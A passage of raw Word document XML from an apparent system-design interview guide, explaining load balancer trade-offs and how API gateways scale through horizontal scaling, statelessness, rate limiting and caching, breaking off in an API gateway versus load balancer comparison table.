        <w:t>: reduces response times via optimal routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6750EA86"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023FE8C6">
          <v:rect id="_x0000_i3130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26420A60" w14:textId="77777777" w:rsidR="0068580F" w:rsidRPr="0068580F" w:rsidRDefault="0068580F" w:rsidP="0068580F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94BA6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Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid routing to dead instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABEC2E0"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ticky sessions may be needed for session-specific apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346E89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Misconfigured strategies can cause uneven traffic distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12559AD6" w14:textId="77777777" w:rsidR="0068580F" w:rsidRPr="0068580F" w:rsidRDefault="00000000" w:rsidP="0068580F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="68D1A5D4">
          <v:rect id="_x0000_i3131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921BD22" w14:textId="77777777" w:rsidR="0068580F" w:rsidRPr="0068580F" w:rsidRDefault="0068580F" w:rsidP="0068580F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E61C6CD"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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Load Balancer</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a foundational infrastructure component that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F19929"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Distributes traffic efficiently,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D8F76"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mproves availability and reliability,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC58C5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Supports dynamic scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5C3B8" w14:textId="77777777" w:rsidR="0068580F" w:rsidRPr="0068580F" w:rsidRDefault="0068580F" w:rsidP="0068580F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It's used across modern architectures including microservices, containerized systems (Kubernetes), and cloud platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F6472"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06708FBD">
          <v:rect id="_x0000_i3132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884665F" w14:textId="3134A19B" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="008A18B1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="735" w:name="_Toc197867949"/>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If API gateway is single</w:t>
      </w:r>
      <w:r w:rsidR="00861120">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>entry point, then how does it will handle millions of requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>per second</w:t>
      </w:r>
      <w:r w:rsidR="007635D1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="735"/>
    </w:p>
    <w:p w14:paraId="39CC97CF" w14:textId="71F8A70A" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="001176C7" w:rsidP="002C2573">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">While the API Gateway is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logical</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850AF1" w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-entry</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> point, it is never deployed as a single instance in production systems. To handle millions of requests per second, it is horizontally scaled and distributed. Here’s how that works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8B910"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6698690F">
          <v:rect id="_x0000_i3133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13109BFE"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How API Gateway Handles Millions of Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D1871"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1. Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF979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Multiple instances of the API Gateway are deployed behind a Load Balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC7757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coming traffic is distributed evenly across all gateway instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F228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Client Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008A14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p>
    <w:p w14:paraId="061FCE2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D3377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lastRenderedPageBreak/>
        <w:t>┌──────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A763D0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LoadBalancer │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F985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25361C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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DAB6A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789D264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Gateway1│Gateway2│Gateway3│ ← Multiple gateway instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1C822"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w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF79A7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         ↓         ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE9AF4"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 xml:space="preserve">   Microservices Cluster (User, Order, Auth, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB720F"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0003506D">
          <v:rect id="_x0000_i3134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13871C"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2. Stateless Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743318F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 instances are stateless, meaning any instance can handle any request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67515C66"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ession or state (like tokens) is stored in a shared backend (e.g., Redis, DB, JWT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752966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1A310F43">
          <v:rect id="_x0000_i3135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76602B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3. Clustered Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62822CB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cloud-native environments, gateways (e.g., Spring Cloud Gateway, Kong, NGINX) are run in Kubernetes, ECS, or VM clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB426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se platforms auto-scale based on load (CPU, memory, request rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60301B6C"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67233084">
          <v:rect id="_x0000_i3136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3098F78B"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4. High-Performance Gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D6C4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ateways like NGINX, Envoy, or Kong are optimized for throughput and can handle tens of thousands of concurrent connections per instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EF4D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Spring Cloud Gateway, being reactive (non-blocking), handles high concurrency efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4E136"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4C0921F0">
          <v:rect id="_x0000_i3137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD0920E"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5. Load Balancers at Multiple Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80213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Global Load Balancer (e.g., AWS Route53, Cloudflare) routes traffic to regional load balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186233F"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gional Load Balancer (e.g., AWS ALB/NLB, GCP LB) routes to API Gateway instances in that zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42032EFC" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="00000000" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1567DE97">
          <v:rect id="_x0000_i3138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E4035"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6. Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C61EFBE"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enforce rate limits to prevent overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437389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Requests beyond thresholds are rejected or delayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658300B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4CD2F7A2">
          <v:rect id="_x0000_i3139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEB8ED"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7. Caching &amp; CDN Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C95D80"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Frequently accessed responses (e.g., static data, tokens) are cached in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014C5A6"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Gateway layer (e.g., using Redis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EF5C73" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="001176C7" w:rsidP="001176C7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Edge layer via CDNs (e.g., Cloudflare, Akamai)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA9E63" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="00000000" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5472E535">
          <v:rect id="_x0000_i3140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B2A68" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="001176C7" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Real-World Use Case Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276CDF1"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In a high-traffic application (e.g., Netflix, Amazon):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7818D"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20–100+ API Gateway pods/VMs might be deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1C063"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Load balancers manage the routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE5859"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Kubernetes or service mesh (like Istio) provides traffic shaping, health checks, and autoscaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69904BFC" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="00000000" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="56CFF68C">
          <v:rect id="_x0000_i3141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBFF3D6" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="001176C7" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA4B28"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API Gateways handle millions of requests per second through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776B350B"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Horizontal scaling (many stateless instances)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC2A0A"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Load balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B32392"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eactive/non-blocking processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4465E080" w14:textId="77777777" w:rsid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Cloud-native auto-scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DEE42" w14:textId="21DA07B1" w:rsidR="001176C7" w:rsidRPr="00A07D8B" w:rsidRDefault="001176C7" w:rsidP="001176C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07D8B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rate limiting, caching, and CDN offloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A3B75"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They are not a bottleneck when designed and deployed correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7DD67" w14:textId="77777777" w:rsidR="001176C7" w:rsidRPr="001176C7" w:rsidRDefault="001176C7" w:rsidP="001176C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Would you like an example setup with Spring Cloud Gateway in Kubernetes or using NGINX/Kong in a scalable setup?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40217D44"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73B6D7DE">
          <v:rect id="_x0000_i3142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF2415" w14:textId="44DE0B9A" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="008A18B1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="736" w:name="_Toc197867950"/>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How API Gateway is different from Load balancer? Does it come before or after the load balancer</w:t>
      </w:r>
      <w:r w:rsidR="007635D1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="736"/>
    </w:p>
    <w:p w14:paraId="62F3CBD7" w14:textId="4166A70D" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="00301A67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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API Gateway vs Load Balancer – Key Differences &amp; Deployment Or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7"/>
        <w:gridCol w:w="4717"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="6FF08680" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DDFF0C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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53254E9F"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API Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
